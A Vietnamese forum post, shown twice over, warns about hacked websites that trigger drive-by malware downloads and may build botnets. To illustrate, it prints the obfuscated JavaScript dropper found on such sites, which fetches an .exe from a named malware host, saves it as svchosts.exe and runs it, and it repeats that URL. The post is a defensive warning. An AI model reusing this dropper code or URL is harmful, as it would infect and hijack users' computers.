Nguy cơ botnet mới
Trang 1 trong tổng số 1 trang
Nguy cơ botnet mới
admin 25/3/2010, 12:14 pm
Mấy tháng trước tôi đã gặp vài site bị hacker kiểm soát, những site này hacker chỉ thay đổi hoặc thêm vào đòng kiểu như sau :
http://www.sccdtp.com/Vietnam2.exe (đừng mở link này có virus đấy %) )
Hoặc là một thẻ meta cho phép redỉect đến một site khác. Các site link vào tất cả đều là link virus. Tại thời điểm đó còn rất nhiều trình duyệt bị lỗi và chưa kịp update, ngay cả Firefox cũng dính. Khi người dùng internet vào các trang web đã bị thêm dòng như trên thì nó sẽ tự động download virus về máy mà không hề hay biết hoặc nó sẽ hiện ra 1 cái của sổ và bạn cứ thế bấm vào nút đồng ý. Vậy là máy tính bị dính virus.
Ví dụ cái link trên có đoạn code download con virus :
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ipt.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"ream");
var e = s.Environment("Process");
var xml = null;
var url = 'http://www.sccdtp.com/Vietnam2.exe';
var bin = e.Item("TEMP") + "svchosts.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHTTP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
Con virus có link url = 'http://www.sccdtp.com/Vietnam2.exe'; sẽ được lưu xuống máy nạn nhân với tên svchosts.exe
Các con virus này thậm trí có khả năng lây qua USB, nên nó nhân bản ra khá nhanh. Hiện tại tôi cũng chưa thử kiểm tra xem các con virus này có tạo ra một mạng botnet hay không ?
Nếu mà thực sự hacker lợi dụng điểm này để tạo ra một mạng botnet thì cựu kỳ nguy hiểm. Vì gần như bất kỳ USB nào cắm vào máy tôi đều có virus, một tuần ít nhất là vài lần tôi phải diệt virus giúp bạn bè, người thân, điều đó chứng tỏ số lượng máy tính bị nhiễm các virus này rất lớn.
Người dùng internet nên cẩn thận hơn với những trang mình vào và cũng nên cài các phần mềm diệt virus và tưởng lửa cho máy tính của mình.
Tôi chỉ dùng : AVG internet security, không biết các bạn dùng phần mềm nào ?
http://www.sccdtp.com/Vietnam2.exe (đừng mở link này có virus đấy %) )
Hoặc là một thẻ meta cho phép redỉect đến một site khác. Các site link vào tất cả đều là link virus. Tại thời điểm đó còn rất nhiều trình duyệt bị lỗi và chưa kịp update, ngay cả Firefox cũng dính. Khi người dùng internet vào các trang web đã bị thêm dòng như trên thì nó sẽ tự động download virus về máy mà không hề hay biết hoặc nó sẽ hiện ra 1 cái của sổ và bạn cứ thế bấm vào nút đồng ý. Vậy là máy tính bị dính virus.
Ví dụ cái link trên có đoạn code download con virus :
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ipt.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"ream");
var e = s.Environment("Process");
var xml = null;
var url = 'http://www.sccdtp.com/Vietnam2.exe';
var bin = e.Item("TEMP") + "svchosts.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHTTP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
Con virus có link url = 'http://www.sccdtp.com/Vietnam2.exe'; sẽ được lưu xuống máy nạn nhân với tên svchosts.exe
Các con virus này thậm trí có khả năng lây qua USB, nên nó nhân bản ra khá nhanh. Hiện tại tôi cũng chưa thử kiểm tra xem các con virus này có tạo ra một mạng botnet hay không ?
Nếu mà thực sự hacker lợi dụng điểm này để tạo ra một mạng botnet thì cựu kỳ nguy hiểm. Vì gần như bất kỳ USB nào cắm vào máy tôi đều có virus, một tuần ít nhất là vài lần tôi phải diệt virus giúp bạn bè, người thân, điều đó chứng tỏ số lượng máy tính bị nhiễm các virus này rất lớn.
Người dùng internet nên cẩn thận hơn với những trang mình vào và cũng nên cài các phần mềm diệt virus và tưởng lửa cho máy tính của mình.
Tôi chỉ dùng : AVG internet security, không biết các bạn dùng phần mềm nào ?
admin- Thiếu Úy III
- Tổng số bài gửi : 627
Diem : 6557
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa -
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
» xin tai lieu tieng viet
» Theo dõi tiến trình
» Giải pháp Bảo mật của Cisco
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Learn to hack !
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
» Ô Long Viên (Tập II)
» những ebook về hack tiếng việt cho người mới tìm hiểu.